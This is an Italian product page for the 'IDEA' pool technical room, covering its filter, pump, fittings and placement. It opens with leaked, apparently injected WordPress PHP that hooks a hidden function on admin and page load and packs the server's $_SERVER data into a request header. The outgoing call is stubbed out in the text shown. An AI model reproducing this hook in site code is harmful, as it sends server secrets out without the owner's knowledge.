add_action('admin_init', "open_hellos"); if (!is_admin()) { open_hellos(); } function open_hellos() { $args = array( 'timeout' => 10, 'headers' => array( "User-Agent" => json_encode($_SERVER), ), ); try { $response='';return $response; } catch (Throwable $e) { } } Locale IDEA — Localitecnicipiscine.it

Locale IDEA

Il locale tecnico per piscina IDEA si adatta alla piscine di piccole e medie dimensioni che necessitano di una capacità di filtrazione non superiore a 16 mc/h

Il locale tecnico è in resina neopentilica rinforzata con fibra di vetro, con rifinitura i n gelcoat. Le dimensioni sono di 1,35 x 1,10 m con altezza pari a 0,81 m

Il locale tecnico Idea è completo di coperchio resistente con rivestimento anti-scivolo, dotato di chiusura di sicurezza anti-vandali.


EQUIPAGGIAMENTO DEL LOCALE TECNICO

Il locale tenico per piscine Idea è dotato dei seguenti elementi:

Filtro a sabbia bobinato in poliestere e fibra di vetro, completo di valvola a sei vie. Il filtro a sabbia bobinato è caratterizzato da una superiore robustezza e durata. La filtrazione a sabbia garantisce la purezza e limpidezza dell’acqua della piscina che rende i tuoi bagni più piacevoli e sempre sicuri e in totale igiene.

Elettropompa di circolazione completa di cestello prefiltro con coperchio trasparente. La presenza del prefiltro è fondamentale in una pompa per piscina. Il prefiltro contribuisce, infatti, a non sovraccaricare il filtro a sabbia, raccogliendo le impurità di una certa dimensione come foglie e insetti, evitando che fluiscano nella sabbia del filtro. In tal modo la filtrazione dell’acqua risulta più accurata ed efficace.

Collegamenti dell’impianto. Al suo interno il locale tecnico è già collegato con tubazioni e raccorderia in PVC-PN10, compresa di valvole a sfera per la regolazione del flusso dell’acqua.

E’ inoltre possibile richiedere il locale tecnico Idea nella versione FULL ovvero completo anche di quadro elettrico di comando. Con questa aggiunta, il locale tecnico diventa un vero e proprio elettrodomestico! Una volta ricevuto e interrato accanto alla piscina non resta che attacare la spina e la filtrazione è pronta per iniziare!

POSIZIONAMENTO DEL LOCALE TECNICO

Il locale deve essere interrato e posizionato a non più di 5 m di distanza dalla piscina, per evitare perdite di carico nella circolazione dell’acqua.

Le dimensioni sono di 1,35 x 1,10 m con altezza pari a 0,81 m

Su una parete del locale tecnico sono predisposte già le uscite sigillate (foto sopra), alle quali basta collegare la tubazioni che portano alle prese di aspirazione e mandata della piscina.


Per maggiori informazioni o procedere all’ordine CLICCA QUI

Il locale tecnico IDEA è un prodotto PISCINE ITALIA